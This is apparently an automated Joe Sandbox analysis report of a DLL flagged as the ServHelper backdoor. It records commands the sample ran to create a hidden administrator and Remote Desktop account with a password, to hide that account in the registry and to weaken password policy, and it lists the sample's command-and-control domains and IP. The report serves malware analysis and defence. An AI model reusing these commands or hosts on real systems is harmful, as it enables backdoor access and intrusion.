Source: Binary string: gdi32full.pdb source: WerFault.exe, 00000023.00000003.720965380.000001E8D6C76000.00000004.00000040.sdmp
Source: Binary string: user32.pdb8 source: WerFault.exe, 00000023.00000003.720965380.000001E8D6C76000.00000004.00000040.sdmp
Source: Binary string: wmiutils.pdb source: WerFault.exe, 00000023.00000003.720913542.000001E8D6C7F000.00000004.00000040.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 00000023.00000003.721203229.000001E8D6C7B000.00000004.00000040.sdmp
Source: Binary string: gdi32.pdb source: WerFault.exe, 00000023.00000003.720965380.000001E8D6C76000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 00000023.00000003.720913542.000001E8D6C7F000.00000004.00000040.sdmp
Source: Binary string: webio.pdbc source: WerFault.exe, 00000023.00000003.720913542.000001E8D6C7F000.00000004.00000040.sdmp
Source: Binary string: winhttp.pdbKE source: WerFault.exe, 00000023.00000003.721203229.000001E8D6C7B000.00000004.00000040.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 00000023.00000003.720965380.000001E8D6C76000.00000004.00000040.sdmp
Source: Binary string: propsys.pdb source: WerFault.exe, 00000023.00000003.721203229.000001E8D6C7B000.00000004.00000040.sdmp
Source: Binary string: fastprox.pdb source: WerFault.exe, 00000023.00000003.720913542.000001E8D6C7F000.00000004.00000040.sdmp
Source: Binary string: win32u.pdb8 source: WerFault.exe, 00000023.00000003.721192200.000001E8D6C79000.00000004.00000040.sdmp
Source: Binary string: wbemsvc.pdb source: WerFault.exe, 00000023.00000003.720913542.000001E8D6C7F000.00000004.00000040.sdmp
Source: Binary string: ncryptsslp.pdb source: WerFault.exe, 00000023.00000003.720913542.000001E8D6C7F000.00000004.00000040.sdmp
Source: Binary string: msctf.pdb source: WerFault.exe, 00000023.00000003.721203229.000001E8D6C7B000.00000004.00000040.sdmp
Source: Binary string: version.pdb source: WerFault.exe, 00000023.00000003.721203229.000001E8D6C7B000.00000004.00000040.sdmp
Source: Binary string: wbemcomn.pdbf source: WerFault.exe, 00000023.00000003.720913542.000001E8D6C7F000.00000004.00000040.sdmp
Source: Binary string: user32.pdb source: WerFault.exe, 00000023.00000003.720965380.000001E8D6C76000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdbQE source: WerFault.exe, 00000023.00000003.721203229.000001E8D6C7B000.00000004.00000040.sdmp
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000023.00000003.721203229.000001E8D6C7B000.00000004.00000040.sdmp
Source: Binary string: loaddll64.pdb source: WerFault.exe, 00000023.00000003.721077963.000001E8D6C72000.00000004.00000040.sdmp
Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 00000023.00000003.720913542.000001E8D6C7F000.00000004.00000040.sdmp
Source: Binary string: netapi32.pdb source: WerFault.exe, 00000023.00000003.721203229.000001E8D6C7B000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000023.00000003.720913542.000001E8D6C7F000.00000004.00000040.sdmp
Source: Binary string: propsys.pdbNE source: WerFault.exe, 00000023.00000003.721203229.000001E8D6C7B000.00000004.00000040.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000023.00000003.721241994.000001E8D6C70000.00000004.00000040.sdmp
Source: Binary string: ws2_32.pdb3 source: WerFault.exe, 00000023.00000003.720913542.000001E8D6C7F000.00000004.00000040.sdmp
Source: Binary string: ntdll.pdb source: WerFault.exe, 00000023.00000003.715383654.000001E8D618C000.00000004.00000001.sdmp
Source: Binary string: wtsapi32.pdb source: WerFault.exe, 00000023.00000003.721203229.000001E8D6C7B000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000023.00000003.721203229.000001E8D6C7B000.00000004.00000040.sdmp
Source: Binary string: netutils.pdbRE source: WerFault.exe, 00000023.00000003.721203229.000001E8D6C7B000.00000004.00000040.sdmp
Source: Binary string: wbemprox.pdb source: WerFault.exe, 00000023.00000003.720913542.000001E8D6C7F000.00000004.00000040.sdmp
Source: Binary string: crypt32.pdb source: WerFault.exe, 00000023.00000003.720913542.000001E8D6C7F000.00000004.00000040.sdmp
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1

Persistence and Installation Behavior:

barindex
Adds a new user with administrator rightsShow sources
Source: unknownProcess created: C:\Windows\System32\net.exe net.exe LOCALGROUP 'Administrators' WgaUtilAcc /ADD
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net.exe LOCALGROUP 'Administrators' WgaUtilAcc /ADD
Source: C:\Windows\system32\drivers\tsusbhub.sysRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\tsusbhub\Parameters\WdfJump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Hides user accountsShow sources
Source: C:\Windows\System32\loaddll64.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList WgaUtilAccJump to behavior
Source: C:\Windows\System32\WerFault.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363} DeviceTicketJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\loaddll64.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\loaddll64.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\System32\loaddll64.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\loaddll64.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\System32\loaddll64.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\loaddll64.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\System32\loaddll64.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\loaddll64.exe TID: 7112Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WerFault.exeFile opened: PhysicalDrive0
Source: loaddll64.exe, 00000000.00000002.785118327.0000025BFF450000.00000002.00000001.sdmp, rundll32.exe, 00000001.00000002.686980246.00000205FCA20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.709285585.000001A381A30000.00000002.00000001.sdmp, rundll32.exe, 00000012.00000002.695931184.000001BFCF3B0000.00000002.00000001.sdmp, rundll32.exe, 0000001A.00000002.703464710.00000160A8D60000.00000002.00000001.sdmp, rundll32.exe, 0000001E.00000002.718112963.0000024ABF320000.00000002.00000001.sdmp, rundll32.exe, 0000001F.00000002.724411852.00000203C0CF0000.00000002.00000001.sdmp, WerFault.exe, 00000023.00000002.781628259.000001E8D6D90000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: WerFault.exe, 00000023.00000002.781062362.000001E8D63FF000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWVE
Source: WerFault.exe, 00000023.00000003.724837730.000001E8D6403000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWVE%SystemRoot%\system32\mswsock.dllSystem32NUMBER_OF_PROCESSORS=2OneDrive=C:\Users\
Source: loaddll64.exe, 00000000.00000002.784618390.0000025BFD9BC000.00000004.00000020.sdmp, WerFault.exe, 00000023.00000002.781049286.000001E8D62C4000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Source: WerFault.exe, 00000023.00000002.781049286.000001E8D62C4000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWK
Source: loaddll64.exe, 00000000.00000002.785118327.0000025BFF450000.00000002.00000001.sdmp, rundll32.exe, 00000001.00000002.686980246.00000205FCA20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.709285585.000001A381A30000.00000002.00000001.sdmp, rundll32.exe, 00000012.00000002.695931184.000001BFCF3B0000.00000002.00000001.sdmp, rundll32.exe, 0000001A.00000002.703464710.00000160A8D60000.00000002.00000001.sdmp, rundll32.exe, 0000001E.00000002.718112963.0000024ABF320000.00000002.00000001.sdmp, rundll32.exe, 0000001F.00000002.724411852.00000203C0CF0000.00000002.00000001.sdmp, WerFault.exe, 00000023.00000002.781628259.000001E8D6D90000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: loaddll64.exe, 00000000.00000002.785118327.0000025BFF450000.00000002.00000001.sdmp, rundll32.exe, 00000001.00000002.686980246.00000205FCA20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.709285585.000001A381A30000.00000002.00000001.sdmp, rundll32.exe, 00000012.00000002.695931184.000001BFCF3B0000.00000002.00000001.sdmp, rundll32.exe, 0000001A.00000002.703464710.00000160A8D60000.00000002.00000001.sdmp, rundll32.exe, 0000001E.00000002.718112963.0000024ABF320000.00000002.00000001.sdmp, rundll32.exe, 0000001F.00000002.724411852.00000203C0CF0000.00000002.00000001.sdmp, WerFault.exe, 00000023.00000002.781628259.000001E8D6D90000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: loaddll64.exe, 00000000.00000003.664636749.0000025BFD9B9000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllC
Source: loaddll64.exe, 00000000.00000003.664404380.0000025BFD9B9000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllVV
Source: loaddll64.exe, 00000000.00000002.785118327.0000025BFF450000.00000002.00000001.sdmp, rundll32.exe, 00000001.00000002.686980246.00000205FCA20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.709285585.000001A381A30000.00000002.00000001.sdmp, rundll32.exe, 00000012.00000002.695931184.000001BFCF3B0000.00000002.00000001.sdmp, rundll32.exe, 0000001A.00000002.703464710.00000160A8D60000.00000002.00000001.sdmp, rundll32.exe, 0000001E.00000002.718112963.0000024ABF320000.00000002.00000001.sdmp, rundll32.exe, 0000001F.00000002.724411852.00000203C0CF0000.00000002.00000001.sdmp, WerFault.exe, 00000023.00000002.781628259.000001E8D6D90000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\system32\drivers\tsusbhub.sysSystem information queried: ModuleInformation
Source: C:\Windows\System32\WerFault.exeProcess information queried: ProcessInformation
Source: C:\Windows\System32\WerFault.exeProcess token adjusted: Debug
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd /C net.exe user WgaUtilAcc 000000 /del
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd /C net.exe user WgaUtilAcc ph9ZVf2Q /add
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd /C net.exe LOCALGROUP 'Remote Desktop Users' WgaUtilAcc /ADD
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd /C net.exe LOCALGROUP 'Remote Desktop Users' user /ADD
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd /C net.exe LOCALGROUP 'Administrators' WgaUtilAcc /ADD
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd /C net.exe user WgaUtilAcc ph9ZVf2Q
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net.exe user WgaUtilAcc 000000 /del
Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net.exe user WgaUtilAcc ph9ZVf2Q /add
Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user WgaUtilAcc ph9ZVf2Q /add
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net.exe LOCALGROUP 'Remote Desktop Users' WgaUtilAcc /ADD
Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 LOCALGROUP 'Remote Desktop Users' WgaUtilAcc /ADD
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net.exe LOCALGROUP 'Remote Desktop Users' user /ADD
Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 LOCALGROUP 'Remote Desktop Users' user /ADD
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net.exe LOCALGROUP 'Administrators' WgaUtilAcc /ADD
Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 LOCALGROUP 'Administrators' WgaUtilAcc /ADD
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net.exe user WgaUtilAcc ph9ZVf2Q
Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user WgaUtilAcc ph9ZVf2Q
Source: C:\Windows\System32\net1.exeKey value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation Bias

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Modifies security policies related informationShow sources
Source: C:\Windows\System32\loaddll64.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa LimitBlankPasswordUseJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management InstrumentationCreate Account1Windows Service1Disable or Modify Tools1OS Credential DumpingSystem Time Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobWindows Service1Process Injection11Modify Registry1LSASS MemorySecurity Software Discovery11Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)LSASS Driver1LSASS Driver1Virtualization/Sandbox Evasion2Security Account ManagerVirtualization/Sandbox Evasion2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)DLL Side-Loading1DLL Side-Loading1Process Injection11NTDSProcess Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptHidden Users1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information1Cached Domain CredentialsSystem Information Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsRundll321DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing11Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)DLL Side-Loading1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 326485 Sample: mediasvc copy.dll Startdate: 03/12/2020 Architecture: WINDOWS Score: 68 53 Antivirus / Scanner detection for submitted sample 2->53 55 Multi AV Scanner detection for submitted file 2->55 57 Adds a new user with administrator rights 2->57 8 loaddll64.exe 4 2 2->8         started        12 tsusbhub.sys 3 2->12         started        14 rdpdr.sys 8 2->14         started        16 rdpvideominiport.sys 4 2->16         started        process3 dnsIp4 51 hitnaiguat.xyz 5.181.156.4, 443, 49740 MIVOCLOUDMD Moldova Republic of 8->51 61 Hides user accounts 8->61 63 Modifies security policies related information 8->63 18 cmd.exe 1 8->18         started        21 cmd.exe 1 8->21         started        23 cmd.exe 1 8->23         started        25 10 other processes 8->25 signatures5 process6 signatures7 59 Adds a new user with administrator rights 18->59 27 net.exe 1 18->27         started        29 net.exe 1 21->29         started        31 net.exe 1 23->31         started        33 net.exe 1 25->33         started        35 net.exe 1 25->35         started        37 net.exe 1 25->37         started        process8 process9 39 net1.exe 1 27->39         started        41 net1.exe 1 29->41         started        43 net1.exe 1 31->43         started        45 net1.exe 1 33->45         started        47 net1.exe 1 35->47         started        49 net1.exe 1 37->49         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
mediasvc copy.dll61%VirustotalBrowse
mediasvc copy.dll32%MetadefenderBrowse
mediasvc copy.dll46%ReversingLabsWin64.Backdoor.ServHelper
mediasvc copy.dll100%AviraHEUR/AGEN.1112831

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
hitnaiguat.xyz1%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://hitnaiguat.xyzdfdlhldfh030%Avira URL Cloudsafe
https://watnaiguat.xyz/0%Avira URL Cloudsafe
http://crl.micro0%URL Reputationsafe
http://crl.micro0%URL Reputationsafe
http://crl.micro0%URL Reputationsafe
http://crl.micro0%URL Reputationsafe
http://cps.letsencrypt.org00%URL Reputationsafe
http://cps.letsencrypt.org00%URL Reputationsafe
http://cps.letsencrypt.org00%URL Reputationsafe
http://cps.letsencrypt.org00%URL Reputationsafe
http://ocsp.int-x3.letsencrypt.org0/0%URL Reputationsafe
http://ocsp.int-x3.letsencrypt.org0/0%URL Reputationsafe
http://ocsp.int-x3.letsencrypt.org0/0%URL Reputationsafe
http://ocsp.int-x3.letsencrypt.org0/0%URL Reputationsafe
https://hitnaiguat.xyz/ctp/b.phpt0%Avira URL Cloudsafe
https://hitnaiguat.xyz/0%Avira URL Cloudsafe
https://hitnaiguat.xyz/ctp/b.php030%Avira URL Cloudsafe
http://bromide.xyz/ssh.zip0%Avira URL Cloudsafe
https://hitnaiguat.xyz/ctp/b.php0%Avira URL Cloudsafe
http://isrg.trustid.ocsp.identru0%Avira URL Cloudsafe
http://sdsddgu.xyz/khkhkt0%Avira URL Cloudsafe
http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
http://cps.root-x1.letsencrypt.org00%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
hitnaiguat.xyz
5.181.156.4
truefalseunknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://hitnaiguat.xyzdfdlhldfh03loaddll64.exe, 00000000.00000003.708751537.0000025BFDC63000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://watnaiguat.xyz/loaddll64.exe, 00000000.00000002.784618390.0000025BFD9BC000.00000004.00000020.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://crl.microWerFault.exe, 00000023.00000002.780388618.000001E8D444E000.00000004.00000020.sdmpfalse
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
unknown
http://cps.letsencrypt.org0loaddll64.exe, 00000000.00000002.784618390.0000025BFD9BC000.00000004.00000020.sdmpfalse
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
unknown
http://ocsp.int-x3.letsencrypt.org0/loaddll64.exe, 00000000.00000002.784618390.0000025BFD9BC000.00000004.00000020.sdmpfalse
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
unknown
https://hitnaiguat.xyz/ctp/b.phptloaddll64.exe, 00000000.00000002.784344742.0000025BFD982000.00000004.00000020.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://cert.int-x3.letsencrypt.org/0-loaddll64.exe, 00000000.00000002.784618390.0000025BFD9BC000.00000004.00000020.sdmpfalse
    high
    https://hitnaiguat.xyz/loaddll64.exe, 00000000.00000002.784706857.0000025BFD9E3000.00000004.00000020.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://hitnaiguat.xyz/ctp/b.php03loaddll64.exe, 00000000.00000003.708751537.0000025BFDC63000.00000004.00000001.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://bromide.xyz/ssh.ziploaddll64.exe, 00000000.00000003.708761089.0000025BFDC6A000.00000004.00000001.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://hitnaiguat.xyz/ctp/b.phploaddll64.exe, 00000000.00000002.784344742.0000025BFD982000.00000004.00000020.sdmp, loaddll64.exe, 00000000.00000002.784753875.0000025BFD9FC000.00000004.00000020.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://isrg.trustid.ocsp.identruWerFault.exe, 00000023.00000003.724805687.000001E8D4487000.00000004.00000001.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://sdsddgu.xyz/khkhktloaddll64.exe, 00000000.00000003.708761089.0000025BFDC6A000.00000004.00000001.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://cps.root-x1.letsencrypt.org0loaddll64.exe, 00000000.00000002.784618390.0000025BFD9BC000.00000004.00000020.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    unknown

    Contacted IPs

    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs

    Public

    IPDomainCountryFlagASNASN NameMalicious
    5.181.156.4
    unknownMoldova Republic of
    39798MIVOCLOUDMDfalse

    General Information

    Joe Sandbox Version:31.0.0 Red Diamond
    Analysis ID:326485
    Start date:03.12.2020
    Start time:15:51:30
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 8m 18s
    Hypervisor based Inspection enabled:false
    Report type:light
    Sample file name:mediasvc copy.dll
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
    Number of analysed new started processes analysed:37
    Number of new started drivers analysed:3
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal68.evad.winDLL@50/5@1/1
    EGA Information:Failed
    HDC Information:Failed
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 0
    • Number of non-executed functions: 0
    Cookbook Comments:
    • Adjust boot time
    • Enable AMSI
    • Found application associated with file extension: .dll
    Warnings:
    Show All
    • Exclude process from analysis (whitelisted): WerFault.exe, backgroundTaskHost.exe, svchost.exe
    • Excluded IPs from analysis (whitelisted): 104.43.193.48, 13.88.21.125, 104.42.151.234, 168.61.161.212, 51.104.144.132, 2.20.142.210, 2.20.142.209, 52.155.217.156, 20.54.26.129, 92.122.213.247, 92.122.213.194
    • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, arc.msn.com.nsatc.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcolcus15.cloudapp.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, au-bg-shim.trafficmanager.net
    • Execution Graph export aborted for target loaddll64.exe, PID 7108 because there are no executed function
    • Report size exceeded maximum capacity and may have missing behavior information.
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.

    Simulations

    Behavior and APIs

    TimeTypeDescription
    15:52:46API Interceptor1x Sleep call for process: loaddll64.exe modified
    15:53:19API Interceptor1x Sleep call for process: WerFault.exe modified

    Joe Sandbox View / Context

    IPs

    No context

    Domains

    No context

    ASN

    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    MIVOCLOUDMDhttps://papyrefb2tdk6czd.onion.ly/Get hashmaliciousBrowse
    • 185.225.19.195
    kvdYhqN3Nh.exeGet hashmaliciousBrowse
    • 185.163.45.187
    sGgozFWk4P.docGet hashmaliciousBrowse
    • 185.163.47.157
    137390617_accse.docGet hashmaliciousBrowse
    • 185.163.47.157
    reit-sap-liona.docGet hashmaliciousBrowse
    • 185.163.47.157
    NEW ORDER.HTMLGet hashmaliciousBrowse
    • 5.181.156.72
    cry1.exeGet hashmaliciousBrowse
    • 94.158.245.3
    prot 64192.xlsmGet hashmaliciousBrowse
    • 94.158.245.3
    prot 64192.xlsmGet hashmaliciousBrowse
    • 94.158.245.3
    cry1.exeGet hashmaliciousBrowse
    • 94.158.245.3
    PO_4000_from_HandyEq.exeGet hashmaliciousBrowse
    • 185.225.17.3
    Receipt#790009465.exeGet hashmaliciousBrowse
    • 185.225.17.3
    isb777amx.exeGet hashmaliciousBrowse
    • 185.163.45.253
    https://bit.ly/32VsT8iGet hashmaliciousBrowse
    • 94.158.244.208
    34867_DOCESDL.msiGet hashmaliciousBrowse
    • 5.181.156.72
    34867_DOCESDL.msiGet hashmaliciousBrowse
    • 5.181.156.72
    7ec016fc.ps1Get hashmaliciousBrowse
    • 5.181.156.62
    http://notice-suspicious-wellsfargo-activity.ml:82/reg74/index.php?=sfdgsdfx222334xfdg4dsxwww2131qweqqweGet hashmaliciousBrowse
    • 5.181.156.168
    Shiping_Details.exeGet hashmaliciousBrowse
    • 185.163.45.247
    https://bit.ly/309OMzrGet hashmaliciousBrowse
    • 185.163.47.144

    JA3 Fingerprints

